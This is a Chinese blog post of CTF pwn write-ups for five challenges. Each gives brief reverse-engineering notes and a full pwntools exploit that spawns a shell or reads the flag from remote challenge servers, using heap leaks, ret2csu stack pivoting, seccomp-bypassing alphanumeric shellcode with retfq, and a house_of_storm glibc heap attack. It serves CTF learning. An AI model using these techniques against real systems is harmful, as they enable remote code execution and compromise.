pwn手记录题1

最新推荐文章于 2024-01-04 07:58:15 发布
最新推荐文章于 2024-01-04 07:58:15 发布
阅读量676 收藏
点赞数
分类专栏: 快乐学习pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/njh18790816639/article/details/125807697
版权

fuzzerinstrospector(首届数字空间安全攻防大赛)

主体流程(相对比较简单,GLibc为常见的2.27版本,
在这里插入图片描述
Allocate申请函数(其中有两个输入函数Read_8Int、Read_context;
在这里插入图片描述
还存在着后门函数;
在这里插入图片描述
关键点在于如何利用Show函数来将地址泄露出来;
在这里插入图片描述
故此时我们可以利用"+"来跳过Allocate函数之中的8次循环输入,但是堆上的内容并没有被破坏;此时我们便可以利用栈上残留的libc地址指向堆中0x100(0x0~0xff)的内容,我们可以根据内容反推出libc地址;进而泄露了地址,故我们可以利用后门函数指向system函数;
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './fuzzerinstrospector'
#r = process(binary)
r = remote('39.105.185.193', 30007)
elf = ELF(binary)
#libc = elf.libc
libc = ELF('./libc-2.27.so')

def Allocate(index,payload='/bin/sh\x00',addr=0x0102030405060708,flag=True):
    r.sendlineafter("Your choice: ",'1')
    r.sendlineafter("Index: ",str(index))
    for i in range(8):
        if flag:
            r.sendlineafter("Index: "+str(i)+": ",'+')
        else:
            tmp = (addr & (0xff << (i*8) )) >> (i*8)
            r.sendlineafter("Index: "+str(i)+": ",str(tmp))
    r.sendlineafter("Bitmap: ",payload.ljust(0x100,'\x00'))

def Edit(index,payload='/bin/sh\x00',addr=0x0102030405060708,flag=True):
    r.sendlineafter("Your choice: ",'2')
    r.sendlineafter("Index: ",str(index))
    for i in range(8):
        if flag:
            r.sendlineafter("Index: "+str(i)+": ",'+')
        else:
            tmp = (addr & (0xff << (i*8) )) >> (i*8)
            r.sendlineafter("Index: "+str(i)+": ",str(tmp))
    r.sendlineafter("Bitmap: ",payload.ljust(0x100,'\x00'))

def Show(index):
    r.sendlineafter("Your choice: ",'3')
    r.sendlineafter("Index: ",str(index))
    addr = ""
    for i in range(8):
        r.recvuntil("Bit: ")
        addr = "" + hex(int(r.recvuntil("\n")[:-1]))[2:] + addr
    return int("0x"+addr,16)

def Free(index):
    r.sendlineafter("Your choice: ",'4')
    r.sendlineafter("Index: ",str(index))

Exit = lambda : r.sendlineafter("Your choice: ",'5')
Shell = lambda : r.sendlineafter("Your choice: ",'6')
spayload = ''
for i in range(0x100):
    spayload += chr(i)

for i in range(9):
    Allocate(i)
for i in range(2,9):
    Free(i)
Free(0)
Free(1)
for i in range(7):
    Allocate(7-i)
Allocate(0,spayload)

libc_base = Show(0)-624-0x10-libc.symbols['__malloc_hook']
system = libc_base+libc.symbols['system']

Edit(0,addr=0x0068732f6e69622f,flag=False)
success(hex(libc_base))
#gdb.attach(r)
Shell()
pause()
r.sendline(str(system))

r.interactive()

Easy Stack(星盟)

如下为程序的具体流程,比较简单,PIE保护开启但是Canary没有开启;

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[128]; // [rsp+0h] [rbp-80h] BYREF

  alarm(0x3Cu);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  read_n(s, 256LL);
  puts(s);
  return 0;
}

通过ida调试,可以发现位于__libc_start_main函数中关键的gadget;(gdb暂时无法定位到__libc_start_main该函数,因为gdb将会直接去运行到main函数位置,并且开启了PIE保护,导致info无法查看到运行时有用的地址信息;
在这里插入图片描述
如下为gdb调试,我们可以发现如何利用该gadget;
在这里插入图片描述
故再次运行到main函数时,便可以修改返回地址为one_gadget,此时便可以获取权限;

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './easy_stack'
#r = process(binary)
r = remote('nc.eonew.cn', 10004)
elf = ELF(binary)
#libc = elf.libc
libc = ELF('./libc-2.27.so')

#gdb.attach(r)
one = [0x415a6,0x415fa,0xdfa51]#[0x4f2c5,0x4f322,0x10a38c]
payload1 = b'a'*0x88+p8(0x80)
r.sendline(payload1)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0xe0-libc.symbols['__libc_start_main']
payload2 = b'a'*0x88+p64(libc_base+one[0])
pause()
r.sendline(payload2)
success(hex(libc_base))

r.interactive()

No leak(星盟)

没有泄露函数,较为明显的ret2dl_resolve的漏洞;(ret2dl_resolve解析
但是却是Full RELRO保护,故几乎无法使用ret2dl_resolve这个漏洞了;

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  alarm(0x3Cu);
  read(0, buf, 0x100uLL);
  return 0;
}

目前的结果是,本地已通过libc2.27,但是远程还没有通过;(暂未知原因;
关键是利用的是
0x0000000000400518 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
这条指令来完成对其__exit_funcs_lock为system进而获取权限;

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './no_leak'
r = process(binary)#    process([binary],env={"LD_PRELOAD":"/home/pwn/question/libc-2.27.so"})
#r = remote('nc.eonew.cn', 10002)
elf = ELF(binary)
libc = elf.libc
#libc = ELF('./libc-2.27.so')

read_got = elf.got['read']
libc_start_main_addr = elf.got['__libc_start_main']
start_addr = 0x00400450
main_addr = 0x00400537
bss_addr = 0x0601010
one1 = 0x04005CA
one2 = 0x04005B0
libc_csu_init_addr = 0x0000000000400570
libc_csu_fini_addr = 0x00000000004005E0
pop_rbp_ret        = 0x00000000004004b8
pop_rdi_ret        = 0x00000000004005d3
pop_rsi_ret        = 0x00000000004005d1
add_rbp_ret        = 0x0000000000400518
leave_ret = 0x0400564
ret_addr = 0x0400565
#0x0000000000400518 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret

#gdb.attach(r)
#r.recvuntil("preload end     ------------------------------\n")
payload1 = b'a'*0x80+p64(bss_addr+0x500)+flat([one1+1,1,read_got,0,bss_addr+0x500,0x100,one2])
payload1 += flat([0,0,bss_addr+0x500,0,0,0,0])+p64(leave_ret)
r.send(payload1.ljust(0x100,b'\x00'))

pause()
payload2 = p64(0)+p64(one1)+flat([0,1,libc_start_main_addr,start_addr,libc_csu_fini_addr,libc_csu_init_addr,one2])+b'/bin/sh\x00'
r.send(payload2.ljust(0x100,b'\x00'))

pause()
offset = 0xFFFFFFFFFFC5EE18# 0x3A11E8    ['__exit_funcs_lock']-['system']
payload3 = b'b'*0x80+p64(bss_addr+0x500)+flat([one1,offset,0x601450+0x3d,0,0,0,0,add_rbp_ret,start_addr])
r.send(payload3.ljust(0x100,b'\x00'))

pause()
payload = b'/bin/sh\x00'+b'c'*0x80+flat([ret_addr,one1,0,1,0x601450,0x601558,libc_csu_fini_addr,libc_csu_init_addr,one2])
r.send(payload)

r.interactive()

调试过程:

  1. 第一步,利用栈溢出布置万能gadget,写入bss段上内容,然后再次利用leave;ret指令,使栈迁移到bss段上;
    在这里插入图片描述
    在这里插入图片描述
  2. 第二步,此时栈跳转到了bss段上,利用第二次输入,布局bss段共上内容,再次利用万能gadget跳转到__libc_start_main函数上;
    注意: 跳转到start上不可以,如果跳转到start上,栈上将没有太多的关于libc的地址;
    在这里插入图片描述
  3. 第三步,断掉于main函数,直接运行至此,然后我们此时再次输入布局栈上,利用万能gadget1与上面提到的关键gadget结合来修改__exit_funcs_lock为system
    在这里插入图片描述
  4. 第四步,利用万能gadget布局寄存器并跳转至system函数,进而执行system(“/bin/sh\x00”); 如果发现没有获取权限,则加入ret指令进行平衡栈即可;
    在这里插入图片描述

shellcode(星盟)

这道题目感觉还好,当时做的时候也并不是一帆风顺的;

pwn@pwn-virtual-machine:~/question$ seccomp-tools dump ./shellcode 
---------- Shellcode ----------
line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x06 0x00 0x00000005  if (A == fstat) goto 0008
0002: 0x15 0x05 0x00 0x00000025  if (A == alarm) goto 0008
0003: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0008
0004: 0x15 0x03 0x00 0x00000000  if (A == read) goto 0008
0005: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0008
0006: 0x15 0x01 0x00 0x000000e7  if (A == exit_group) goto 0008
0007: 0x06 0x00 0x00 0x00000000  return KILL
0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW

此时发现为64位程序,并且存在着保护;并通过ida查看伪代码发现:

v6 = sys_write(1u, "Input your shellcode: ", 0x16uLL);
v7 = sys_read(0, v5, 0x1000uLL);
v8 = v7;
if ( v5[(int)v7 - 1] == 10 )
{
    v5[(int)v7 - 1] = 0;
    v8 = v7 - 1;
}
for ( i = 0; i < v8; ++i )
{
    if ( v5[i] <= 31 || v5[i] == 127 )
    {
        v10 = sys_write(1u, "Check!\n", 7uLL);
        goto LABEL_10;
    }
}
((void (*)(void))v5)();
LABEL_10:
  v11 = sys_exit_group(0);

我们可以看到v5数组进行排查我们所输入的shellcode,条件是v5[i] <= 31 || v5[i] == 127;实际上这里ida分析错误啦,应该是v5[i] <= 31 || v5[i] < 127,通过查看汇编可以发现大于0x80实际为负数(符号位置1了),相当于在v5[i] <= 31这个条件之中;
然后我就开始思考常规orw之中缺失了o条件该怎么办?当时我一直以为需要通过fstat函数来得到flag的文件标识符;但是通过查阅资料发现fstat函数的参数为文件标识符,返回为结构体(文件标识符所指向文件的信息);故我开始思考,如果传入fstat函数之中的参数是0、1、2(stdin、stdout、stderr)呢?我通过测试,发现成功了,但是返回的内容对于获取flag并没有帮助,返回了一些文件信息等无用的信息。那能通过这些东西得到flag吗?
卡住了;不过发现了几遍文章,其中存在着解析,将其引向了retfq该指令,该指令意思是64位与32位之间进行跳转,而syscall_fstat的rax为5,32位之中的open的syscall_number同样为5;
此时orw俱全,便是常规orw的套路;不过编写shellcode的时候废了好大劲,调试了好久;

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux')

binary = './shellcode'
#r = process(binary)
r = remote('nc.eonew.cn','10011')
elf = ELF(binary)

shellcode_mmep = '''
/* sys_mmap(0LL, 0x1000uLL, 7uLL, 0x22uLL, 0xFFFFFFFFuLL, 0LL); */
/* sys_mmap(0x60606060,0x7e,7,0x22,0,0) */
    push 0x60606060;
    pop rdi;            /* rdi */
    push 0x7e;
    pop rsi;            /* rsi */
    push 47;
    pop rax;
    xor al,40;
    push rax;
    pop rdx;            /* rdx */

    push 0x20;
    pop rax;
    xor al,0x20;        /* rax */

    push rax;
    pop r8;             /* r8  */
    push rax;
    pop r9;             /* r9  */

/*  syscall  */
    push rbx;
    pop rax;
    push 93;
    pop rcx;
    xor byte ptr[rax+0x31],cl;
    push 95;
    pop rcx;
    xor byte ptr[rax+0x32],cl;

    push 0x40;          /* rax */
    pop rax;
    xor al,0x49;
    push 0x22;
    pop rcx;            /* rcx */
/*  syscall替换  */
    push rdx;
    pop rdx;
'''
shellcode_mmep = asm(shellcode_mmep,arch='amd64',os='linux')

shellcode_read = '''
/* sys_read(0, v5, 0x1000uLL); */
/* sys_read(0, rax, 0x7e); */
    push rsi;
    pop rdx;           /* rdx */
    push 0x60606060;
    pop rsi;           /* rsi */
    push 0x20;
    pop rax;
    xor al,0x20;
    push rax;
    pop rdi;           /* rdi */

/*  syscall  */
    push rbx;
    pop rax;
    push 93;
    pop rcx;
    xor byte ptr[rax+0x55],cl;
    push 95;
    pop rcx;
    xor byte ptr[rax+0x56],cl;

    push 0x20;
    pop rax;
    xor al,0x20;       /* rax */
/*  syscall替换  */
    push rdx;
    pop rdx;
'''
shellcode_read = asm(shellcode_read,arch='amd64',os='linux')

shellcode_retfq = '''
/*  retfq=cb48  */
    push rbx;
    pop rax;
    push 54;
    pop rcx;
    xor byte ptr[rax+0x6c],cl;
    push 0x55;
    pop rcx;
    sub byte ptr[rax+0x6d],cl

    push 0x23
    push 0x60606060
/*  syscall替换  */
/*  0x7e    */
/*  0x20    */
'''
shellcode_retfq = asm(shellcode_retfq,arch='amd64',os='linux')
#===================第二阶段shellcode===================
shellcode_open = '''
/* rax = open("flag") */
    mov esp,0x60606160;
    push 0x67616c66;
    push esp;
    pop ebx;
    xor ecx,ecx;
    mov eax,5;
    int 0x80;
    mov ecx,eax;
/* 调整至64位 */
    push 0x33;
    push 0x60606090;
/*  0x48 0xcb  */
'''
shellcode_open = asm(shellcode_open,arch='i386')

shellcode_flag = '''
/* sys_read(rax,rsp,0x50); */
/* sys_write(1,rsp,0x50); */
    mov rdi,rcx;
    mov rsi,rsp;
    mov rdx,0x50;
    xor rax,rax;
    syscall;                /* sys_read  */
    mov rdi,1;
    mov rax,1;
    syscall;                /* sys_write */
'''
shellcode_flag = asm(shellcode_flag,arch='amd64',os='linux')

#gdb.attach(r,'b *0x004002EB')
payload1 = shellcode_mmep+shellcode_read+shellcode_retfq+b'\x7e\x20'
print(payload1)
r.send(payload1)

pause()
payload2 = shellcode_open+b'\x48\xcb'+b'\x90'*0x10+shellcode_flag
r.send(payload2)

r.interactive()

注意:
避免ararm关闭程序,可以如下操作
在这里插入图片描述
参考链接:

  1. https://www.jianshu.com/p/754b0a2ae353
  2. https://xz.aliyun.com/t/6645#toc-4
  3. https://www.cnblogs.com/countfatcode/p/11756258.html

House of Storm(星盟)

主体流程比较简单,而且是libc2.23较旧版本的glibc;
在这里插入图片描述
看下new_environment函数是个什么东东?
在这里插入图片描述
我们发现了一个函数change_addr函数,其实就是PIE,本题开启了PIE保护,但是却又多此一举改变了地址,不懂;
在这里插入图片描述
如下,较为成功,而且难度不大;
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './house_of_storm'
#r = process(binary)
r = remote('nc.eonew.cn', 10001)
elf = ELF(binary)
#libc = elf.libc
libc = ELF('./libc-2.23.so')

def Allocate(size):
    r.sendlineafter("Your choice?\n",'1')
    r.sendlineafter("What size do you want?\n",str(size))

def Free(index):
    r.sendlineafter("Your choice?\n",'2')
    r.sendlineafter("delete?\n",str(index))

def Edit(index,payload=b'/bin/sh\x00'):
    r.sendlineafter("Your choice?\n",'3')
    r.sendlineafter("to modify?\n",str(index))
    r.sendafter("to input?\n",payload)

def Show(index):
    r.sendlineafter("Your choice?\n",'4')
    r.sendlineafter("to see?\n",str(index))

Exit = lambda : r.sendlineafter("Your choice?\n",'5')

Allocate(0x18)#0
Allocate(0x408)#1       0020    largebin
Allocate(0x18)#2
Allocate(0x418)#3       0450    unsortedbin
Allocate(0x18)#4
Free(1)
Free(3)
#========================leak========================
Show(1)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-0x68
libc_base = malloc_hook-libc.symbols['__malloc_hook']
Show(3)
heap_addr = u64(r.recv(6).ljust(8,b'\x00'))-0x20
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
#=======================attack=======================
Allocate(0x418)#5       0450
Free(5)
fake_largebin = flat([malloc_hook+0x458,free_hook-0x10+8,heap_addr+0x20,free_hook-0x10-0x18-5])
fake_chunk = p64(malloc_hook+0x68)+p64(free_hook-0x10)
Edit(1,fake_largebin)
Edit(5,fake_chunk)

Allocate(0x48)#6
Edit(6,p64(system))
Edit(0)
Free(0)
success("heap_addr ->"+hex(heap_addr))
success("libc_base -> "+hex(libc_base))
#gdb.attach(r)


r.interactive()

典型的house_of_storm例子:(不懂原理照猫画虎都能做出来pwn题;

// gcc -ggdb -fpie -pie -o house_of_storm house_of_storm.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
struct {
    unsigned long  presize;
    unsigned long  size;
    unsigned long  fd;
    unsigned long  bk;
    unsigned long  fd_nextsize;
    unsigned long  bk_nextsize;
}chunk;

int main()
{
    unsigned long *large_chunk,*unsorted_chunk;
    unsigned long *fake_chunk = (unsigned long *)&chunk;
    char *ptr;


    unsorted_chunk=malloc(0x418);
    malloc(0X20);
    large_chunk=malloc(0x408);
    malloc(0x20);



    free(large_chunk);
    free(unsorted_chunk);
    unsorted_chunk=malloc(0x418);  //large_chunk归位
    free(unsorted_chunk);  // unsorted_chunk归位

	//重点一下3步
    unsorted_chunk[1] = (unsigned long )fake_chunk;
    large_chunk[1]    = (unsigned long )fake_chunk+8;
    large_chunk[3]    = (unsigned long )fake_chunk-0x18-5;

    
    ptr=malloc(0x48);
    strncpy(ptr, "/bin/sh\x00", 0x10);
    system(((char *)fake_chunk + 0x10));
    
    return 0;
}

然后再看源码找找原理是怎么一回事?

while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
	{//首先伪造unsorted_chunks (av)的bk指向fake_chunk,那么将会进入到此循环
	  bck = victim->bk;//相当于bck = fake_chunk		而victim为unsorted_chunk
	  if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
		  || __builtin_expect (victim->size > av->system_mem, 0))
		malloc_printerr (check_action, "malloc(): memory corruption",
						 chunk2mem (victim), av);
	  size = chunksize (victim);

	  /*
		 如果是小请求,请尝试使用最后的余数(如果是
		 只有未排序的箱子中的区块。这有助于促进
		 连续小请求的运行。这是唯一的
		 最佳拟合例外,仅当存在
		 不适合一小块.
	   */
	  /*	需要是smallbin范围内&bck不是unsorted_chunks链头&victim为last_remainder指针指向&size容量足够	*/
	  if (in_smallbin_range (nb) &&
		  bck == unsorted_chunks (av) &&
		  victim == av->last_remainder &&
		  (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
		{
		  ''''''}

	  /* remove from unsorted list */
	  unsorted_chunks (av)->bk = bck;//unsorted_chunks (av)->bk = fake_chunk;
	  bck->fd = unsorted_chunks (av);//fake_chunk+0x10 = unsorted_chunks (av)

	  /* Take now instead of binning if exact fit */
	  /* 如果unsorted_chunk的size恰好与申请的size相同 */
	  if (size == nb)
		{
		  ''''''}

	  /* place chunk in bin */
	  /* 如果unsorted_chunk的size位于smallbin的范围内 */
	  if (in_smallbin_range (size))
		{
		  ''''''}
	  else// unsorted_chunk的size位于largebin的范围内 
		{
		  victim_index = largebin_index (size);//获取size对应的largebin的index
		  bck = bin_at (av, victim_index);//bck指向size对应的largebin的链头
		  fwd = bck->fd;//相当于 fwd = largebin;

		  /* maintain large bins in sorted order */
		  if (fwd != bck)//如果largebin非空,则执行链入操作
			{
			  /* Or with inuse bit to speed comparisons */
			  size |= PREV_INUSE;
			  /* if smaller than smallest, bypass loop below */
			  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
			  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))//如果unsorted_chunk的size小于largebin->bk->size;相当于是fake_chunk->size
				{
				  ''''''}
			  else
				{
				  assert ((fwd->size & NON_MAIN_ARENA) == 0);
				  while ((unsigned long) size < fwd->size)//使unsorted的size大于largebin->size;防止进入死循环
					{
					  fwd = fwd->fd_nextsize;
					  assert ((fwd->size & NON_MAIN_ARENA) == 0);
					}

				  if ((unsigned long) size == (unsigned long) fwd->size)//如果恰好相等,则无需修改fd_nextsize与bk_nextsize
					''''''else
					{
					  victim->fd_nextsize = fwd;//unsorted_chunk->fd_nextsize = largbin_chunk;
					  victim->bk_nextsize = fwd->bk_nextsize;//unsorted_chunk->bk_nextsize = largbin_chunk->bk_nextsize;
					  //相当于unsorted_chunk->bk_nextsize = fake_chunk+0x18-5
					  fwd->bk_nextsize = victim;//largbin_chunk->bk_nextsize = unsorted_chunk;
					  victim->bk_nextsize->fd_nextsize = victim;//(fake_chunk+0x18-5)->fd_nextsize = unsorted_chunk;
					  //相当于fake_chunk+0x3 = unsorted_chunk;
					}
				  bck = fwd->bk;//bck = largbin_chunk->bk;相当于bck = fake_chunk+0x8
				}
			}
		  else
			victim->fd_nextsize = victim->bk_nextsize = victim;
		}

	  mark_bin (av, victim_index);//把unsorted_chunk加入到的bin的表示为非空
	  victim->bk = bck;//unsorted_chunk->bk = largbin_chunk->bk;
	  //*相当于unsorted_chunk->bk = fake_chunk+0x8
	  victim->fd = fwd;//unsorted_chunk->fd = largbin_chunk;
	  fwd->bk = victim;//largbin_chunk->bk = unsorted_chunk;
	  bck->fd = victim;//largbin_chunk->bk->fd = unsorted_chunk;
	  //fake_chunk+0x18 =  unsorted_chunk

#define MAX_ITERS       10000
	  if (++iters >= MAX_ITERS)
		break;
	}

第27、28行unsorted_chunks (av)->bk = bck;以及bck->fd = unsorted_chunks (av);,将fake_chunk链入到了unsortedbin之中了,并且伪造了fake_chunk的fd指针指向unsortedbin;
第77行victim->bk_nextsize->fd_nextsize = victim;伪造了fake_chunk的size域;
第92行bck->fd = victim;伪造了fake_chunk的bk;
到此完好的链入了unsortedbin之中一块伪造的任意地址fake_chunk;

参考链接:house_of_storm详解

四代机您发多少
关注
专栏目录
PWN[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4599
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
【DSCTF2022】pwn记录
Assassin
07-26 1475
DSCTF 2022 pwn报告
PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
最新发布
Mr_Fmnwon的博客
01-04 772
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
Pwn_0xGame_01
Trick的博客
11-08 590
Pwn_0xGame1.欢迎来到0xGame平台2.帮我取一个题目名称ret2text3.easy_stack4.该怎么起名呢shellcode5.variable_coverage变量覆盖 1.欢迎来到0xGame平台 nc出flag 2.帮我取一个题目名称 ret2text 打开IDA分析 main函数 跟进 第二个函数 s栈大小为20h=32 函数最后return read了s 所以很好写了 因为是64位程序,后面再加上8个字符 payload = 'a' * (0x20+8) Shift+F1
pwnable_orw-seccomp沙箱
个人笔记
04-11 766
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);动生成读取文件shellcode。
pwn】orw&rop --泄露libc基址,orw
question55的博客
12-04 317
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
pwn环境搭建_CTF中pwn的搭建
weixin_39864373的博客
12-19 1833
2017年5月11日 补:1、socat 中有参数reuseaddr,使用的时候加上这个,顾名思义,这个参数的意思就是地址(端口)重用,是为了防止socat绑定失败或者由于某些情况退出时,重新使用此端口需要等待2分钟的时间。如果端口忙,但TCP状态位于 TIME_WAIT ,可以重用端口。如果端口忙,而TCP状态位于其他状态,重用端口时依旧得到一个错误信息,指明”地址已经使用中”。如果你的服务程序...
BugKu做记录pwn】(持续更新中)
Assassin
04-06 3909
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做了,刚刚开始的签到就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
BUUCTF【pwn】解记录(1-3页已完结)
Assassin
05-05 1987
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4368
BUUCTF刷记录
国赛your_pwn,PIE保护
playmaker的博客
05-13 1949
题目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
BUUCTF pwn大赏(七)(更新中)
o琦野o的博客
04-02 188
BUUCTF pwn大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1606
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
攻防世界pwn--stack2
L0g1c的博客
10-31 573
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
从零开始的数据结构与算法
weixin_47012384的博客
10-26 301
1.模板函数 //增强代码的复用性,更改T即可以更改数据结构 // T 可以改为其他名字,如 Item // template <typename T1, T2...> template <typename T> void swap(T &a, T &b) { T temp; temp = a; a = b; b = temp; } 2.new int( )和new int[ ]的区别 new int[ ] 是创建一个int型数组,数组大小是在[ ]中指定,
今天你pwn了吗(中)
蚁景网安学院
05-15 797
Y今天你pwn了吗前言:"二进制太难了", 一起到 buu 开始 刷吧。这里 仅记录下非高分题目的解思路和知识讲解。特别是文章里的函数,我特意整理了下,希望我能在二进...
二进制学习(pwn)-shellcode
liulanghouzi的博客
09-21 1700
帮助二进制安全爱好者入门~
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1457
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
从今天开始入门pwn了,misc简直不当人了!!!
hu_c_t_f的博客
05-11 787
学了半年CTF,misc花的时间是最多的,然后还会一点web(审计简单的js文件还是会做的,比如2023年的iscc练武羊了个羊,十多分钟就做出来了,而misc的第一个练武,做了1个多小时,主要是一下子没想到)此外在NKCTF和GDOUCTF中misc出竟然是最少的,我作为misc直接坐牢。。。。在NKCTF打社工,GDOUCTF打密码(misc现状)
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值